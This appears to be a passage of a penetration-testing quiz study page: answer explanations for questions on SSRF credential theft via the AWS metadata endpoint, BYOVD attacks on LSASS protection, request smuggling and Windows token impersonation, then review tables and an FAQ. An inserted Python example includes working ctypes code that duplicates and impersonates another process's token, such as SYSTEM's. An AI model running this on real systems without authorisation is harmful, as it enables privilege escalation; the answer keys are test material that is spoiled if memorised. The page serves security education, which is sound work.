Correct: A. By forcing the vulnerable instance to query the internal AWS metadata service (169.254.169.254) to extract the temporary IAM security credentials attached to the instance role.
The AWS IMDSv1 metadata endpoint (169.254.169.254/latest/meta-data/iam/security-credentials/) returns temporary IAM role credentials when queried from any EC2 instance. An SSRF flaw allows an external attacker to bounce a request through the server to this endpoint, stealing credentials used to pivot within the AWS account.
18. How do advanced threat actors typically bypass LSA Protection (RunAsPPL) to dump credentials from LSASS memory?
Correct: C. By utilizing a vulnerable, legitimately signed third-party driver (BYOVD attack) to execute kernel-mode code that systematically strips the protection flags from the LSASS process memory space.
RunAsPPL (Protected Process Light) prevents user-mode processes from reading LSASS memory. BYOVD (Bring Your Own Vulnerable Driver) abuses a legitimately signed but vulnerable driver (e.g., RTCore64.sys) to execute kernel-mode code that removes the PP/PPL protection flags from LSASS, allowing Mimikatz to dump it.
19. What is the fundamental mechanism of an "HTTP Request Smuggling" (CL.TE / TE.CL) attack?
Correct: D. Exploiting discrepancies in how front-end proxies and back-end servers parse the Content-Length and Transfer-Encoding headers, allowing an attacker to "smuggle" a hidden, secondary request into the back-end.
HTTP Request Smuggling exploits inconsistent parsing between a front-end proxy and back-end server. In CL.TE, the front-end uses Content-Length while the back-end uses Transfer-Encoding. The attacker crafts a request where the discrepancy 'smuggles' a hidden request prefix that the back-end prepends to the next legitimate user's request.
20. What is "Token Impersonation" in the context of Windows post-exploitation?
Correct: B. Exploiting elevated privileges (like SeImpersonatePrivilege or SeDebugPrivilege) to duplicate the access token of a higher-privileged process (like SYSTEM) and applying it to the attacker's active thread or process.
Windows access tokens define the security context of a process/thread. With SeImpersonatePrivilege or SeDebugPrivilege, a lower-privileged attacker can use DuplicateTokenEx() and ImpersonateLoggedOnUser() (or Incognito/Metasploit's steal_token) to clone a SYSTEM token and apply it, effectively running as SYSTEM.
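The privilege check and the API sequence from the explanation above, as an added example that is not part of the original question set. The first function triages the output of `whoami /priv` (the sample output below is constructed) for the privileges that enable token abuse, flagging them even when they are Disabled, since a privilege that is present on the token can be re-enabled with AdjustTokenPrivileges. The second function performs the duplicate-and-impersonate sequence with ctypes against kernel32 and advapi32; it is Windows-only, is guarded so the module still imports elsewhere, and the target PID is whatever the operator supplies.

```python
import re
import sys

# Privileges whose presence on the current token opens a token-abuse path (assumed mapping for this example).
TOKEN_ABUSE_PRIVS = {
    "SeImpersonatePrivilege": "impersonate any token you can get a handle to (ImpersonateLoggedOnUser)",
    "SeAssignPrimaryTokenPrivilege": "start a process under a duplicated primary token (CreateProcessAsUser)",
    "SeDebugPrivilege": "open SYSTEM processes and their tokens (OpenProcess / OpenProcessToken)",
}

# Win32 constants used by impersonate_process_token().
PROCESS_QUERY_INFORMATION = 0x0400
TOKEN_QUERY = 0x0008
TOKEN_DUPLICATE = 0x0002
TOKEN_IMPERSONATE = 0x0004
SECURITY_IMPERSONATION = 2   # SECURITY_IMPERSONATION_LEVEL
TOKEN_TYPE_IMPERSONATION = 2  # TOKEN_TYPE


def triage_privileges(whoami_priv_output):
    """Return {privilege: state} for every token-abuse privilege in `whoami /priv` output.
    State is reported for information only: Disabled still means the privilege is held."""
    found = {}
    for line in whoami_priv_output.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m and m.group(1) in TOKEN_ABUSE_PRIVS:
            found[m.group(1)] = m.group(2)
    return found


def impersonate_process_token(pid):
    """Duplicate the primary token of `pid` into an impersonation token and apply it to this thread.
    Opening a SYSTEM process needs SeDebugPrivilege; applying its token needs SeImpersonatePrivilege.
    Returns the duplicated token handle (caller owns it; call RevertToSelf to drop the impersonation)."""
    if sys.platform != "win32":
        raise OSError("Windows only: uses kernel32/advapi32 through ctypes")
    import ctypes
    from ctypes import wintypes

    k32, adv = ctypes.windll.kernel32, ctypes.windll.advapi32
    # Declare signatures so 64-bit HANDLE values are not truncated to C int.
    k32.OpenProcess.restype = wintypes.HANDLE
    k32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
    adv.OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
    adv.DuplicateTokenEx.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.c_void_p,
                                     ctypes.c_int, ctypes.c_int, ctypes.POINTER(wintypes.HANDLE)]
    adv.ImpersonateLoggedOnUser.argtypes = [wintypes.HANDLE]

    h_proc = k32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
    if not h_proc:
        raise ctypes.WinError()
    h_token = wintypes.HANDLE()
    if not adv.OpenProcessToken(h_proc, TOKEN_QUERY | TOKEN_DUPLICATE, ctypes.byref(h_token)):
        raise ctypes.WinError()
    h_dup = wintypes.HANDLE()
    if not adv.DuplicateTokenEx(h_token, TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE, None,
                                SECURITY_IMPERSONATION, TOKEN_TYPE_IMPERSONATION, ctypes.byref(h_dup)):
        raise ctypes.WinError()
    if not adv.ImpersonateLoggedOnUser(h_dup):
        raise ctypes.WinError()
    return h_dup  # the calling thread now runs in the target's security context


# Constructed `whoami /priv` output for a typical service account (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
"""

if __name__ == "__main__":
    for priv, state in triage_privileges(SAMPLE_WHOAMI_PRIV).items():
        print(f"{priv} ({state}): {TOKEN_ABUSE_PRIVS[priv]}")
```

On the constructed output the triage flags SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege and ignores the two benign privileges; SeDebugPrivilege is absent, which is the cue that a direct OpenProcess on a SYSTEM process will fail and a coercion-based approach is needed before `impersonate_process_token()` is useful.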
Key Takeaways: Penetration Testing
- PT Phases: Reconnaissance → Scanning → Enumeration → Exploitation → Post-Exploitation → Reporting.
- Rules of Engagement (RoE): A signed, legally binding agreement defining in-scope targets, testing windows, points of contact, and prohibited techniques.
- Testing Methodologies: Black-box gives the tester no prior knowledge, simulating an external attacker; gray-box provides partial knowledge or credentials; white-box provides full source, architecture, and credentials.
- Exploitation & Privilege Escalation: Gaining initial access is only the start; privilege escalation (SUID binaries, DLL hijacking, token impersonation) shows how far a foothold can be pushed.
- Post-Exploitation Proof: Exfiltrating dummy data, moving laterally (pass-the-hash), and extracting domain credentials (DCSync) demonstrate the real business impact of a finding.
- Risk Prioritization in Reports: The primary deliverable is an actionable report in which each finding is rated with CVSS and paired with concrete remediation guidance.
Quick Review & Summary
Use this summary table to consolidate key concepts before or after attempting the questions above.
| PT Phase | Goal | Techniques |
|---|---|---|
| Reconnaissance | Gather target intelligence without touching the target | Passive OSINT, WHOIS, public code repositories |
| Scanning | Discover live hosts, open ports, and running services | Nmap stealth scans, banner grabbing, version detection |
| Enumeration | Extract users, shares, and service details from discovered systems | SNMP polling, Active Directory LDAP queries, SMB share enumeration |
| Exploitation | Establish an initial foothold | Credential spraying, buffer overflows, public software exploits |
| Post-Exploitation | Escalate privileges, move laterally, and prove impact | Privilege escalation, pass-the-hash, Kerberoasting |
| Reporting | Communicate findings with defensible risk ratings | CVSS severity scoring, remediation guidance and timelines |
Frequently Asked Questions
Q. What is penetration testing?
Q. What are the phases of a penetration test?
Q. What is the difference between black-box, white-box, and grey-box testing?
Q. What is the scope in a penetration test and why does it matter?
Q. What is a CVE and how is it used in penetration testing?
Q. What tools are commonly used in penetration testing?
Q. What is the difference between a vulnerability assessment and a penetration test?
Struggling with some questions? Re-read the full Theory Guide: Penetration Testing
Conclusion: Penetration Testing as Controlled Attack
Penetration testing simulates real-world attacks within agreed Rules of Engagement to proactively surface vulnerabilities. These 60 MCQs span reconnaissance, active scanning, exploitation, privilege escalation, post-exploitation lateral movement, and professional reporting.
The best way to ensure retention is combining MCQ practice + theory review + interview preparation. Use these questions in Study Mode to learn concepts immediately, then test yourself in Exam Mode for certification and interview readiness.
After completing this MCQ set, explore our penetration testing interview questions for deeper technical discussions, and review the full theory notes for detailed explanations of each concept covered here.